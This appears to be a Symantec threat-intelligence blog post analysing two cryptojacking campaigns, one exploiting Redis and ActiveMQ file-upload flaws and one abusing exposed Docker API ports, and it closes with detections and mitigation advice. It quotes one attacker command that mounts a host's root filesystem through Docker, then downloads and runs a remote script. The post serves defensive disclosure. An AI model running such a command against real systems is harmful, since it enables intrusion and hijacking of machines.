Cryptojacking Criminals Are Using Multiple Techniques to Install Coinminers

Symantec has been tracking several cryptojacking campaigns that use bugs and exposed API ports to compromise computers.

Symantec has blocked more than 309 million cryptojacking attempts in the last quarter and this number is likely to increase further as cyber criminals use every possible way to get their coinminers onto users’ computers. In our work to protect customers from cryptojacking, we have been tracking multiple campaigns taking advantage of various software vulnerabilities, as well as exposed APIs, to install miners on computers. We’ll take a closer look at couple of these campaigns in this blog.

Campaign 1: Targeting vulnerabilities

Initial alert

From various sensors that Symantec has deployed around the world we noticed an attack on port 6379 exploiting an arbitrary file upload vulnerability in the open-source in-memory data structure store Redis.

Figure 1. Redis arbitrary file upload exploit setting up a cron job

The Redis vulnerability can be exploited by attackers to upload arbitrary files, which allows them to create entries in the crontab file. This allows the attackers to schedule cron jobs that download and execute a Bash script file hosted on Pastebin every minute. The Bash script downloads Base64-encoded data, also hosted on Pastebin. The decoded data is actually another Bash script that performs several actions including, but not limited to:

1. Ending other coin-mining processes running on the system

2. Downloading and running its own coin-mining programs

3. Setting up cron jobs, similar to the one shown in Figure 1

4. Adding iptables rule to restrict access to port 6379 from the internet

Infection module

One of the functions found in the decoded Bash script is a single line of Python code that downloads another Base64-encoded Python script from Pastebin.

Figure 2. Python code that downloads payloads from Pastebin

The downloaded script, when decoded, reveals the campaign’s spreading mechanism, which makes use of a couple of vulnerabilities to widen its roots. The first vulnerability is an arbitrary file upload vulnerability (CVE-2016–3088) in the Fileserver web application in the open-source message broker ActiveMQ.

Figure 3. Snippet of exploit code for the arbitrary file upload vulnerability in the Fileserver web application in ActiveMQ

The second vulnerability is the arbitrary file upload vulnerability in Redis, which was the initial source for tracking down this campaign.

Figure 4. Snippet of exploit code for the Redis arbitrary file upload vulnerability

Also included in the Python script was a URL used to retrieve a list of target IP addresses. The IP addresses were downloaded from an image hosting site (thyrsi[dot]com).

Figure 5. Snippet of code responsible for downloading list of target IP addresses

The wallet address used in this campaign has a couple of worker IDs; one for the XMR-Stak coinminer (sixx) and another for the XMRig coinminer (sixy). Although when querying the wallet address online we get a few more workers.

Figure 6. Different worker ID stats associated with the Monero account

Campaign 2: A different tactic via Docker

We also found a similar campaign where attackers are targeting open Docker API ports to download and execute coinminers. They start by scanning the internet for open ports 2375 (Docker REST API — HTTP port) and 2376 (Docker REST API — HTTPS port) using the Masscan tool. When an open instance is found, the attackers send a request to create a container with the following command:

docker -H tcp://$HOSTLINE run — rm -v /:/mnt alpine chroot /mnt /bin/sh -c “wget http://IP/auto.sh -O /auto.sh;chmod 777 /auto.sh;sh /auto.sh;”

The “auto.sh” file performs several actions including, but not limited to:

1. Install packages like systemd, cURL, Masscan, iproute2, OpenSSH

2. Add the users “richard” and “frank” to the system

3. Establish backdoor access to the machine by modifying the SSH config file to listen on port 22 as well as 7878, enabling password authentication, and adding pubic keys to the SSH authorized_key file

4. Use Masscan to scan the subnet (gathered from the infected machine) for other open 2375 and 2376 ports and use this information to spread using open Docker API ports

Finally, it downloads a script from Pastebin that ends other mining-related processes on the system and runs its own binaries for mining the Monero cryptocurrency.

Protection

The following Symantec Intrusion Prevention System (IPS) detections protect customers from these attacks:

Attack: Redis UnAuthorized File Upload

Web Attack: Apache ActiveMQ CVE-2016–3088

Web Attack: Malicious Payload Upload 6

System Infected: Miner.Bitcoinminer Activity 7

Figure 7 shows Symantec IPS detections protecting users from these coin-mining attacks.

Figure 7. Symantec IPS detections protecting users from coin-mining attacks

Mitigation

Vendors have since published updates to address the vulnerabilities discussed in this blog. Symantec advises users to ensure their computers and software are fully patched. Docker users should avoid exposing Docker REST API ports on the internet and configure Docker to use TLS authentication to avoid attackers misusing it.

Further reading

For more information on cryptojacking, read the following:

Cryptojacking: A Modern Cash Cow

Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.

Like this story? Recommend it by hitting the heart button so others on Medium see it, and follow Threat Intel on Medium for more great content.